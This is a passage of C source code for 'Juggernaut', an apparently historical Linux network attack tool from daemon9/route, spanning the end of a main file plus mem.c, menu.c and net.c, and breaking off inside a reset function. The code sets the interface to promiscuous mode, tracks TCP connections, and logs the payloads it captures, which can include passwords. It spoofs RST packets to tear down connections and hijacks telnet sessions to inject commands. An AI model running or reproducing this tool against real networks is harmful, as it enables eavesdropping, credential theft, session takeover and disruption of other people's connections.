+            getchar();     
+        }
+    	return;
+    }
+    fprintf(stderr,"\nEnter target IP (optional) [q] >");
+    fgets(buf,sizeof(buf),stdin);
+    if(buf[0]=='q')return;			
+    if(buf[0]==0x0a)target=0;		    /* target may be null, in this 
+                                               case, we only care where
+                                               the connection is coming from */
+    else if(!(target=nameResolve(buf))){
+	if(verbosity){
+            fprintf(stderr,"Name lookup failure: %s\n[cr]",buf);
+            getchar();     
+        }
+    	return;
+    }
+    if(!target)fprintf(stderr,"Reseting all connection requests from:\t %s\n",hostLookup(source));
+    else fprintf(stderr,"Reseting all connection requests from:\t %s --> %s\n",hostLookup(source),hostLookup(target));
+    fprintf(stderr,"[cr]");
+    getchar();
+    acrst(source,target);							
+}
+
+
+/* 
+ *  dumpc wrapper
+ */
+
+float dump(){
+
+    float dumpc();
+    float usage=0;
+
+    fprintf(stderr,"\nCurrent Connection Database:\n");
+    fprintf(stderr,"-------------------------------------------------\n");
+    fprintf(stderr,"ref #    source                            target  \n\n");
+    usage=dumpc();
+    fprintf(stderr,"-------------------------------------------------\n");
+
+    return usage;
+}
+
+
+/*
+ *  database manipulation routines go here..
+ */
+
+void dbmanip(){
+
+    float dump();
+    void cleardb();
+
+    float usage=0;
+    char buf[MINIBUF];
+
+    usage=dump();
+
+    if(usage)fprintf(stderr,"\nDatabase is %.02f%% to capacity.",usage);
+    else fprintf(stderr,"\nDatabase is empty.");
+
+    fprintf(stderr,"\n[c,q] >");
+    fgets(buf,sizeof(buf),stdin);
+
+    if(buf[0]=='c'){
+        fprintf(stderr,"\nClear entire connection database? [y/N] >");
+        fgets(buf,sizeof(buf),stdin);
+        if(buf[0]=='y'){
+            cleardb();
+            fprintf(stderr,"\nConnection database cleared.\n[cr]");
+            getchar();
+        }
+    }
+}
+
+/*
+ *  Juggernaut version and option information
+ */
+
+void jinfo(){
+
+    time_t current=0;
+
+    fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version);
+
+    fprintf(stderr,"\nJuggernaut compiled with the following options:\n");
+#ifdef MULTI_P
+    fprintf(stderr," Multi-processing\n");
+#endif
+
+#ifdef NOHUSH
+    fprintf(stderr," Audible notification\n");
+#endif
+
+#ifdef USENAME
+    fprintf(stderr," Use hostnames\n");
+#endif
+
+#ifdef GREED
+    fprintf(stderr," Greedy connections\n");
+#endif
+
+#ifdef FASTCHECK
+    fprintf(stderr," Fast IP checksuming\n");
+#endif
+
+#ifdef IP_HDRINCL
+    fprintf(stderr," IP header include\n");
+#endif
+
+#ifdef THREAD
+    fprintf(stderr," Multi-threading\n");
+#endif
+
+    time(&current);
+    fprintf(stderr,"Juggernaut has been running %.02f minutes\n",(difftime(current,uptime)/60));   
+
+    fprintf(stderr,"[cr]");            
+    getchar();
+}
+
+/*
+ *  csimplexhijack wrapper
+ */
+
+void simplexhijack(){
+
+
+    void sputter();
+    float dump();
+    void csimplexhijack(struct connectionInfo *,char *);
+    void cspy(struct connectionInfo *,FILE *);
+    struct connectionInfo *checkc(int);
+	
+    char buf[MINIBUF];
+    char commandbuf[BUFSIZE];
+    unsigned short val;
+    struct connectionInfo *target;
+
+    dump();							
+	
+    while(1){
+    	fprintf(stderr,"\nChoose a connection [q] >");
+    	fgets(buf,sizeof(buf),stdin);
+    	if(buf[0]==0x0a||buf[0]=='q')return;
+    	if(!(int)(val=atoi(buf)))continue;
+    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
+    	else break;
+    }
+    if(ntohs(target->dport)!=23){
+    	fprintf(stderr,"Hijacking only valid with telnet connections.\n");
+    	fprintf(stderr,"[cr]");
+    	getchar();
+    	return;
+    }		
+    fprintf(stderr,"Enter the command string you wish executed [q] >");
+    fgets(commandbuf,sizeof(commandbuf),stdin);
+    if(commandbuf[0]==0x0a)return;
+    fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
+    fprintf(stderr,"\nNOTE: This may cause an ACK storm until client is RST.\n");
+    signal(SIGINT,sputter);
+    sigsentry=1;
+    cspy(target,0);					
+    csimplexhijack(target,commandbuf);
+    fprintf(stderr,"[cr]");
+    getchar();
+}
+
+
+/*
+ *  chijack wrapper
+ */
+
+void hijack(){
+
+    void sputter();
+    float dump();
+    void chijack(struct connectionInfo *);
+    void cspy(struct connectionInfo *,FILE *);
+    struct connectionInfo *checkc(int);
+	
+    char buf[MINIBUF];
+    unsigned short val;
+    struct connectionInfo *target;
+
+    dump();							
+	
+    while(1){
+    	fprintf(stderr,"\nChoose a connection [q] >");
+    	fgets(buf,sizeof(buf),stdin);
+    	if(buf[0]==0x0a||buf[0]=='q')return;
+        if(!(int)(val=atoi(buf)))continue;
+        if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
+    	else break;
+    }
+    if(ntohs(target->dport)!=23){
+    	fprintf(stderr,"Hijacking only valid with telnet connections.\n");
+    	fprintf(stderr,"[cr]");
+    	getchar();
+    	return;
+    }		
+    fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
+    fprintf(stderr,"\nNOTE: This will cause an ACK storm and desynch the client until the connection is RST.\n");
+    signal(SIGINT,sputter);
+    sigsentry=1;
+    cspy(target,0);					
+    sigsentry=1;
+    chijack(target);
+    fprintf(stderr,"[cr]");
+    getchar();
+}
+
+
+/*
+ *  Prometheus wrapper (packet assembly workshop)
+ */
+
+void pkta(){
+
+    void mpkta();
+    void mwipe();
+    int prometheus(int);
+	
+    int val,mode;
+    char buf[MINIBUF];
+  
+    while(1){
+        mwipe();
+        mpkta();
+        fgets(buf,sizeof(buf),stdin);
+        if(!(val=atoi(buf)))continue;
+        switch(val){
+            case 1:                     /* TCP */
+                mode=1;
+	        break;		
+	    case 2:                     /* UDP */
+        	mode=2;
+		break;		
+	    case 3:                     /* ICMP */
+            	mode=3;
+		break;		
+	    case 4:                     /* IP */
+                mode=4;
+	        break;		
+	    case 5:                     /* Return */
+	        return;
+	    default:
+	        continue;
+        }
+        if(prometheus(mode))break;
+    }   			
+	                                /* NOT REACHED */
+}
+
+<-->
+<++> Juggernaut/NumberOneCrush/mem.c
+/*
+ *
+ *                                  Juggernaut
+ *                                  Version b1
+ *
+ *                            1996/7 Guild productions
+ *                           daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ * 
+ *  mem.c - contains shared memory and semaphore control logic
+ * 
+ *  Multi-process:
+ *  Initializing and accesing shared memory:
+ *  ----------------------------------------
+ *  - Create the shared segment
+ *  - Attach each process to the segment (in our case, the hunter child 
+ *    process will inherit a pointer to the block)
+ *  - Grab a semaphore 
+ *  - Lock the semaphore; Manipulate shared segment; unlock the semaphore 
+ *
+ *
+ *  Multi-threaded:
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <sys/types.h>
+#include <sys/ipc.h>
+#include <sys/sem.h>
+#include <sys/shm.h>
+
+#define SHMKEY 242 	            /* Shared memory key */
+#define SEMKEY 424 	            /* Semaphore key */
+#define PERMS 0666                  /* Shared Memory Permissions */
+#define MAXNODES 512		    /* Maximum number of nodes */
+#define ADDMSG "+"
+#define DELMSG "-"
+
+int semid;                          /* Semaphore ID */
+
+struct sembuf lock[2]={{0,0,0},{0,1,SEM_UNDO}};         
+                                    /* wait for sem#0 to become 0 then 
+                                       increment sem#0 by 1 */
+struct sembuf ulock[1]={{0,-1,(IPC_NOWAIT|SEM_UNDO)}};  
+                                    /* decrement sem#0 by 1 (sets it to 0) */
+
+struct epack{                       /* Generic Ethernet packet w/o data payload */
+    struct ethhdr eth;              /* Ethernet Header */
+    struct iphdr ip;                /* IP header */
+    struct tcphdr tcp;              /* TCP header */
+    char payload[8192];             /* Data Payload */
+}epack;
+
+static struct connectionInfo{       /* Simple tuple structure */
+    unsigned long saddr;            /* Source IP */
+    unsigned long daddr;            /* Destination IP */
+    unsigned short sport;           /* Source TCP Port */
+    unsigned short dport;           /* Destination TCP Port */
+}*cinfo=0;
+
+extern int verbosity;
+
+/*
+ *  Creates the shared memory segment then attaches it; then creates a binary 
+ *  semaphore to guarantee exclusive access.  Clears the structure array.
+ *  Dumps some info.    
+ *  Much credit to Richard Stevens and Jeff Thompson.
+ */
+
+void powerup(){
+	
+    void locks();
+    void ulocks();
+    void cleardb();
+
+    int shmid;              	    /* Shared memory segment id */
+    int len;
+	
+    len=sizeof(struct connectionInfo)*MAXNODES;
+
+                                    /* Request a shared memory segment */
+    if((shmid=shmget(SHMKEY,len,IPC_CREAT))<0){			
+        if(verbosity)perror("(powerup) shared memory segment allocation error [fatal]");
+        exit(1);
+    }
+                                    /* Get one semaphore to perform shared 
+                                       memory locking with */
+    if((semid=semget(SEMKEY,1,IPC_CREAT|PERMS))<0){        	
+        if(verbosity)perror("(powerup) semaphore allocation error [fatal]");
+	exit(1);        
+    }
+                                    /* Attach to the shared memory segment */
+    cinfo=(struct connectionInfo *)shmat(shmid,0,0);		
+
+    cleardb();
+}
+
+/*
+ *  Release the shared memory segment.
+ */
+
+void powerdown(){
+
+    void locks();
+    void ulocks();
+
+    locks();
+    shmdt((char *)cinfo);           /* Dettach the segment. */
+    ulocks();
+}
+
+/*
+ *  Locks the semaphore so the caller can access the shared memory segment.  
+ *  This is an atomic operation.
+ */
+
+void locks(){
+    if(semop(semid,&lock[0],2)<0){
+        if(verbosity)perror("(locks) could not lock semaphore [fatal]");
+        exit(1);
+    }
+}
+        
+/*
+ *  Unlocks the semaphore so the caller can access the shared memory segment. 
+ *  This is an atomic operation.
+ */
+
+void ulocks(){
+    if(semop(semid,&ulock[0],1)<0){
+        if(verbosity)perror("(ulocks) could not unlock semaphore [fatal]");
+        exit(1);
+    }
+}
+
+
+/* 
+ *  Add a connection to our list.  Linear search of the WHOLE list to see if 
+ *  it's already there (which IT SHOULDN'T BE...), if not, add it in the
+ *  first open slot.
+ */
+
+char *addc(iphp,tcphp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+{
+    void locks();
+    void ulocks();
+        
+    int i=0;        
+			                /* A wonderfully inefficient linear 
+                                           search for duplicates */
+
+    locks();				/* Lock shared memory segment */
+    for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
+        ulocks();
+	return(0);                      /* Opps.  Found a duplicate */
+    }
+        		                /* Find available slot */
+    for(i=0;i<MAXNODES;i++){
+	if(cinfo[i].saddr)continue;
+	else{
+	    cinfo[i].saddr=iphp->saddr;
+	    cinfo[i].daddr=iphp->daddr;
+	    cinfo[i].sport=tcphp->source;
+            cinfo[i].dport=tcphp->dest;
+            ulocks();
+	    return(ADDMSG);
+	}
+    }			                /* Control falls here if array is 
+                                           full (which is indicative of
+                                           a BUSY NETWORK!@*/
+    ulocks();
+    return(0);		                
+}
+
+
+/* 
+ *  Remove a connection from our list.  Linear search until we find a 
+ *  correspoding entry, or we hit the end of the list.
+ */
+
+char *delc(iphp,tcphp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+{
+        
+    void locks();
+    void ulocks();
+
+    int i=0;        
+
+    locks();                        /* Lock shared memory segment */
+    for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
+	bzero(&cinfo[i],sizeof(cinfo[i]));
+	ulocks();
+        return(DELMSG);		    /* Inform caller of success */
+    }
+    ulocks();
+    return(0);		            /* hmm.  Wierd.   */
+}
+
+
+/* 
+ *  Dump the connection list.
+ */
+
+float dumpc()
+{
+    void locks();
+    void ulocks();
+    char *hostLookup(unsigned long);
+
+    int i=0;        
+    float j=0;
+
+    locks();
+    for(;i<MAXNODES;i++)if(cinfo[i].saddr){
+        fprintf(stderr,"(%d)\t %s [%d]\t-->\t %s [%d]\n",i+1,hostLookup(cinfo[i].saddr),ntohs(cinfo[i].sport),hostLookup(cinfo[i].daddr),ntohs(cinfo[i].dport));
+        j++;
+    }
+    ulocks();
+    if(!j)return(0);
+    return(((j/MAXNODES)*100));     /* % utilization */
+}
+
+
+/* 
+ *  Check for a connection by index number.  Really only here to make sure the
+ *  connection hasn't been deleted since dump() was called....  I think I
+ *  will deprecate this function in future versions...
+ */
+   
+struct connectionInfo *checkc(target)
+int target;
+{       
+    void locks();
+    void ulocks();
+
+    static struct connectionInfo tmp;
+        
+    locks();				    /* Lock shared memory segment */
+    if(cinfo[--target].saddr){			
+	memcpy(&tmp,&cinfo[target],sizeof(tmp));
+	ulocks();
+	return(&tmp);			
+    }
+    ulocks();				    /* Nope.  Not there */
+    return((struct connectionInfo *)0);
+}
+
+
+/*
+ *  Clear the connection database
+ */
+
+void cleardb(){
+
+    void locks();
+    void ulocks();
+
+    int i=0;
+
+    locks();
+    for(;i<MAXNODES;i++)bzero(&cinfo[i],sizeof(cinfo[i]));
+    ulocks();     
+}
+<-->
+<++> Juggernaut/NumberOneCrush/menu.c
+/*
+ *
+ *                                  Juggernaut
+ *                                  Version b2
+ *
+ *                            1996/7 Guild productions
+ *                           daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ *
+ *  menu.c - menu functions.
+ * 
+ */
+
+#include <stdio.h>
+
+extern char version[];
+
+/*
+ *  Initial Screen
+ */
+
+void minit(){
+ 
+    printf("\t\t\t   J U G G E R N A U T\n");
+    printf("\t\t    multipurpose network tool for Linux\n");
+    printf("\t\t\t       version: %s\n",version);
+    printf("\n\n\n\n\n\n");
+    printf("\t  (c) 1996/7 daemon9 | A Guild Corporation Production\t\t\t\n");
+    printf("\n\n\n\n\n\n");
+}
+
+/*
+ *  Main Menu
+ */
+
+void mmain(){
+
+    printf("\t\t\t           Juggernaut\n");
+    printf("\t\t\t+------------------------------+\n");
+    printf("\t\t\t?) Help\n");
+    printf("\t\t\t0) Program information\n");
+    printf("\t\t\t1) Connection database\n");
+    printf("\t\t\t2) Spy on a connection\n");
+    printf("\t\t\t3) Reset a connection\n");
+    printf("\t\t\t4) Automated connection reset daemon\n");
+    printf("\t\t\t5) Simplex connection hijack\n");
+    printf("\t\t\t6) Interactive connection hijack\n");
+    printf("\t\t\t7) Packet assembly module\n");
+    printf("\t\t\t8) Souper sekret option number eight\n");
+    printf("\t\t\t9) Step Down\n");
+    printf("\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}	
+
+/*
+ *  Packet Assembly Menu [prometheus module]
+ */
+
+void mpkta(){
+
+    printf("\t\t\t     Packet Assembly Module (beta)\n");
+    printf("\t\t\t+------------------------------+\n");
+    printf("\t\t\t1. TCP Assembler\n");
+    printf("\t\t\t2. UDP Assembler\n");
+    printf("\t\t\t3. ICMP Assembler\n");
+    printf("\t\t\t4. IP Assembler\n");
+    printf("\t\t\t5. Return to previous menu\n");
+    printf("\n\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}
+
+/*
+ *  TCP assembly options menu
+ */
+
+void mpktatcp(packetready,source,destination,seqnum,acknum,control,window,data)
+int packetready;
+unsigned short source;
+unsigned short destination;
+unsigned long seqnum;
+unsigned long acknum;
+char *control;
+unsigned short window;
+char data[512];
+{
+
+    printf("\t\t\t     TCP Packet Assembly\n");
+    printf("\t\t\t+------------------------------+\n");
+    if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
+    else printf("\t\t\tSource port: %d\n",source);
+    if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
+    else printf("\t\t\tDestination port: %d\n",destination);
+    if(!(packetready&0x04))printf("\t\t\t3. Sequence Number\n");
+    else printf("\t\t\tSequence Number: %ld\n",seqnum);
+    if(!(packetready&0x08))printf("\t\t\t4. Acknowledgement Number\n");
+    else printf("\t\t\tAcknowledgement Number: %ld\n",acknum);
+    if(!(packetready&0x10))printf("\t\t\t5. Control Bits\n");
+    else printf("\t\t\tControl Flags: %s\n",control);
+    if(!(packetready&0x20))printf("\t\t\t6. Window Size\n");
+    else printf("\t\t\tWindow Size: %d\n",window);
+    if(!(packetready&0x40))printf("\t\t\t7. Data Payload\n");
+    else printf("\t\t\tData payload: %s\n",data);
+    printf("\t\t\t8. Return to previous menu\n");
+    printf("\t\t\t9. Return to main menu\n");
+    if(packetready==0x7F)printf("\t\t\t10. Pass packet to RIP assembler\n");
+    printf("\n\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}
+
+/*
+ *  UDP assembly options menu
+ */
+
+void mpktaudp(packetready,source,destination,data)
+int packetready;
+unsigned short source;
+unsigned short destination;
+char data[512];
+{
+    printf("\t\t\t     UDP Packet Assembly\n");
+    printf("\t\t\t+------------------------------+\n");
+    if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
+    else printf("\t\t\tSource port: %d\n",source);
+    if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
+    else printf("\t\t\tDestination port: %d\n",destination);
+    if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
+    else printf("\t\t\tData payload: %s\n",data);
+    printf("\t\t\t4. Return to previous menu\n");
+    printf("\t\t\t5. Return to main menu\n");
+    if(packetready==0x7)printf("\t\t\t6. Pass packet to RIP assembler\n");
+    printf("\n\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}
+
+/*
+ *  ICMP assembly options menu
+ */
+
+void mpktaicmp(packetready,type,code,data)
+int packetready;
+unsigned short type;
+unsigned short code;
+char data[512];
+{
+
+    printf("\t\t\t     ICMP Packet Assembly\n");
+    printf("\t\t\t+------------------------------+\n");
+    if(!(packetready&0x01))printf("\t\t\t1. Type\n");
+    else printf("\t\t\tType: %d\n",type);
+    if(!(packetready&0x02))printf("\t\t\t2. Code\n");
+    else printf("\t\t\tCode: %d\n",code);
+    if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
+    else printf("\t\t\tData payload: %s\n",data);
+    printf("\t\t\t4. Return to previous menu\n");
+    printf("\t\t\t5. Return to main menu\n");
+    if(packetready==0x07)printf("\t\t\t6. Pass packet to RIP assembler\n");
+    printf("\n\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}
+
+/*
+ *  IP assembly options menu
+ */
+
+void mpktaip(packetready,tos,fflags,fo,ttl,saddr,daddr,number,packettype)
+int packetready;
+char *tos;
+char *fflags;
+unsigned short fo;
+unsigned short ttl;
+char *saddr;
+char *daddr;
+int number;
+char *packettype;
+{
+
+    printf("\t\t\t     IP Packet Assembly\n");
+    printf("\t\t\t+------------------------------+\n");
+    if(!(packetready&0x01))printf("\t\t\t1. TOS\n");
+    else printf("\t\t\tTOS: %s\n",tos);
+    if(!(packetready&0x02))printf("\t\t\t2. Fragment Flags\n");
+    else printf("\t\t\tFragment flags: %s\n",fflags);
+    if(!(packetready&0x04))printf("\t\t\t3. Fragment Offset\n");
+    else printf("\t\t\tFragment offset: %d\n",(fo&0x1fff));
+    if(!(packetready&0x08))printf("\t\t\t4. TTL\n");
+    else printf("\t\t\tTTL: %d\n",ttl);
+    if(!(packetready&0x10))printf("\t\t\t5. Source Address\n");
+    else printf("\t\t\tSource Address: %s\n",saddr);
+    if(!(packetready&0x20))printf("\t\t\t6. Destination Address\n");
+    else printf("\t\t\tDestination Address: %s\n",daddr);
+    if(!(packetready&0x40))printf("\t\t\t7. Number of packets to send\n");
+    else printf("\t\t\tSending %d packet(s)\n",number);
+    printf("\t\t\t8. Return to previous menu\n");
+    printf("\t\t\t9. Return to main menu\n");
+    if(packetready==0x7f)printf("\t\t\t10. Transmit %s packet(s)\n",packettype);
+    printf("\n\n\n\n\n\n\n\n\n\n");
+    printf(">");
+}
+
+/*
+ *  Clear the Screen
+ */
+
+void mwipe(){
+
+    printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
+}
+<-->
+<++> Juggernaut/NumberOneCrush/net.c
+/*
+ *
+ *                                  Juggernaut
+ *                                  Version b1
+ *
+ *                            1996/7 Guild productions
+ *                           daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ * 
+ *  net.c - network/socket control code and abstract data types 
+ * 
+ *  In the interest of time overhead vs. code size, I created several functions
+ *  that do much the same thing.  You will notice the reset and jack code is 
+ *  quite redundant.  Life is rough like that.  Deal with it.  Also, there are 
+ *  problems with freeing malloc'd memory.
+ * 
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <string.h>
+#include <setjmp.h>
+#include <unistd.h>
+#include <linux/socket.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/if_ether.h>
+#include <linux/if_arp.h>
+#include <linux/if.h>
+#include <linux/sockios.h>
+#include <sys/time.h>
+#include <sys/resource.h>
+#include <sys/ioctl.h>
+
+#define DEVICE "eth0"
+#define ETHHDR  14
+#define PHDR    12
+#define TCPHDR  20
+#define IPHDR   20
+#define BUFSIZE 512
+#define MINIBUF	10
+#define RSTS	10	/* Number of RSTs to send when RSTing a connection */
+#define JCKRST	3	/* You may wish to experiment with this value.  The 
+			   smaller it is, your command have less time to 
+			   complete on the target.  However, the ACK storm 
+			   will also be much shorter... */
+#define SNIFLOG "./juggernaut.log.snif"
+					   
+struct iphdr  *iphp;	    /* Pointer into current packets IP header */
+struct tcphdr *tcphp;       /* Pointer into current packets TCP header */
+struct ethhdr *ethhp;	    /* Pointer into current packets ethernet header */
+
+			    /* Macro to align the pointers into the ethernet, 
+                               IP, and TCP headers. */
+#define ALIGNNETPOINTERS(){\
+    ethhp=(struct ethhdr *)(((unsigned long)&epack.eth));\
+    iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);\
+    tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);\
+}
+
+struct epack{               /* Generic Ethernet packet w/o data payload */
+    struct ethhdr eth;      /* Ethernet Header */
+    struct iphdr ip;        /* IP header */
+    struct tcphdr tcp;      /* TCP header */
+    char payload[8192];	    /* Data Payload */
+}epack;
+
+struct connectionInfo{
+    unsigned long saddr;    /* Source IP */
+    unsigned long daddr;    /* Destination IP */
+    unsigned short sport;   /* Source TCP Port */
+    unsigned short dport;   /* Destination TCP Port */
+};
+
+jmp_buf env;		    /* To preserve our environment */
+extern int verbosity;       /* Should we dump error messages? */
+
+/*
+ *  Creates a low level raw-packet socket and puts the device into promiscuous 
+ *  mode.
+ */
+
+int tap(device)
+char *device;
+{
+	
+    int fd;				
+    struct ifreq ifr;   /* Link-layer interface request structure */
+                        /* Ethernet code for IP 0x800==ETH_P_IP */
+    if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){	
+        if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]");
+        exit(1);					           
+    }
+    strcpy(ifr.ifr_name,device);				
+    if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){    /* Get the device info */
+        if(verbosity)perror("(tap) Can't get device flags [fatal]");
+        close(fd);
+      	exit(1);
+    }
+    ifr.ifr_flags|=IFF_PROMISC;	            /* Set promiscuous mode */
+    if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){    /* Set flags */
+        if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]");
+        close(fd);
+	exit(1);
+    }
+    return(fd);
+}
+
+
+/*
+ *  Gimme a raw-IP socket.  Use of IP_HDRINCL is automatic with 2.0.x
+ *  kernels.  Not sure about 1.2.x
+ */
+
+int rawsock(){
+
+    int fd,val=1;
+    
+    if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
+        if(verbosity)perror("\n(rawsock) Socket problems [fatal]");
+        exit(1);
+    }  
+
+#ifdef IP_HDRINCL
+    if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0){  
+	if(verbosity){
+            perror("Cannot set IP_HDRINCL socket option");
+	    fprintf(stderr,"\nIf you are relying on this rather then a hacked kernel to spoof packets, your sunk.\n[cr]");
+            getchar();
+        }
+    }
+#endif
+
+    return(fd);
+}	
+
+
+/*
+ *  Hunter.  At this point, only cares about connection information (infant
+ *  connections and tear-downs).  I should have it pass SEQ and ACK related
+ *  info to the relevant functions...  This function will be forked to the
+ *  backround as a seperate process, and in future versions it will be
+ *  implemented as a seperate thread of execution.
+ */
+                 
+void chunt(){
+
+    void add(struct iphdr *,struct tcphdr *,struct ethhdr *);
+    void del(struct iphdr *,struct tcphdr *);
+
+    extern int linksock;		/* raw packet socket */
+    
+    ALIGNNETPOINTERS();
+					/* No alarm timeout here.  We block forever until packets zing by */
+    while(1)if(recv(linksock,&epack,sizeof(epack),0)){
+        if(iphp->protocol==IPPROTO_TCP&&(tcphp->syn&&!tcphp->ack))add(iphp,tcphp,ethhp);
+	if(iphp->protocol==IPPROTO_TCP&&(tcphp->rst||tcphp->fin))del(iphp,tcphp); 
+    }
+}
+
+/*
+ *  addc() wrapper.  Checks to make sure we want to add this connection to
+ *  our list....  At this point, we'll take ftp control, ssh (well, we can
+ *  RST them) telnet, smtp, http, rlogin, and irc.  
+ */
+
+void add(iphp,tcphp,ethhp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+struct ethhdr *ethhp;       /* Future Use */
+{
+    char *addc(struct iphdr *, struct tcphdr *);
+
+    char *msg;
+
+#ifdef GREED
+    if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+#ifdef NOHUSH
+    fprintf(stderr,"%c",7);
+#endif    
+    return;
+#else
+    switch(ntohs(tcphp->dest)){
+        case 21:
+        case 22:
+        case 23:
+        case 25:
+        case 80:
+        case 513:
+        case 6667:
+            if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+#ifdef NOHUSH
+            fprintf(stderr,"%c",7);
+#endif    
+            return;
+        default:
+            return;
+    }
+#endif
+}
+
+
+/*
+ *  delc() wrapper.  Checks connection port number to see if we should even
+ *  bother passing to the delete function which will do a potentially expensive
+ *  linear search...
+ */
+
+void del(iphp,tcphp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+{
+    char *delc(struct iphdr *, struct tcphdr *);
+
+    char *msg;
+
+#ifdef GREED
+    if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+    return;
+#else
+    switch(ntohs(tcphp->dest)){
+        case 21:
+        case 22:
+        case 23:
+        case 25:
+        case 80:
+        case 513:
+        case 6667:
+            if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+            return;
+        default:
+            return;
+    }
+#endif
+}
+
+
+/*
+ *  Spy on a connection.  If the packet captured is from the target connection, 
+ *  call dumpp().  If fp is valid, prepend header/append footer.
+ */
+
+void cspy(target,fp)
+struct connectionInfo *target;
+FILE *fp;
+{
+
+    char *hostLookup(unsigned long);
+    void dumpp(char *,int,FILE *);
+
+    extern int sigsentry;
+    int tlinksock=tap(DEVICE);	/* Spying tap.  XXX- Really dumb way to do this... */
+    time_t tp;
+
+    ALIGNNETPOINTERS();
+	
+    fprintf(stderr,"Spying on connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
+    if(fp){
+        fprintf(fp,"---------------------------------------------------------------------\n: Juggernaut connection spy log header\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport));
+        time(&tp);
+        fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
+    }
+		    /* NO alaram timeout here.  SIGINT kills our spy session */
+    while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp);
+	
+    if(fp){
+        fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport)
+
+
+
+
+
+
+
+
+
+);
+        time(&tp);
+        fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
+    }
+    close(tlinksock);
+}
+
+
+/*
+ *  Dumps the payload.  Dump to file if we have a valid FP.
+ */
+
+void dumpp(payload,length,fp)
+char *payload;
+int length;
+FILE *fp;
+{
+    register int tickytacky=0;
+ 
+    for(;tickytacky<length;tickytacky++){
+        fprintf(stderr,"%c",payload[tickytacky]);
+	if(fp)fprintf(fp,"%c",payload[tickytacky]);
+    }
+	
+}
+ 
+
+/*
+ *  RST both ends of a connection.  Listen for the client to send a packet so 
+ *  we know where the seq/ack #s are and then spoof 10 RSTs to the client which
+ *  will then send a RST to the other end when it recieves the legitimate
+ *  response packet.
+ */
+
+void crst(target)
+struct connectionInfo *target;
+{
+
+    void nettimeout();
+    char *hostLookup(unsigned long);
+    unsigned short in_cksum(unsigned short *,int);
+
+    char *tempBuf=0;
+    extern int ripsock;	
+    extern int netreadtimeout;
+
+    struct sockaddr_in sin;         
+    
+    struct tpack{               /* Generic TCP packet w/o payload */
+        struct iphdr ip;
+        struct tcphdr tcp;
+    }tpack;
+
+    struct psuedoHeader{
+        unsigned long saddr;
+        unsigned long daddr;
+        unsigned char null;
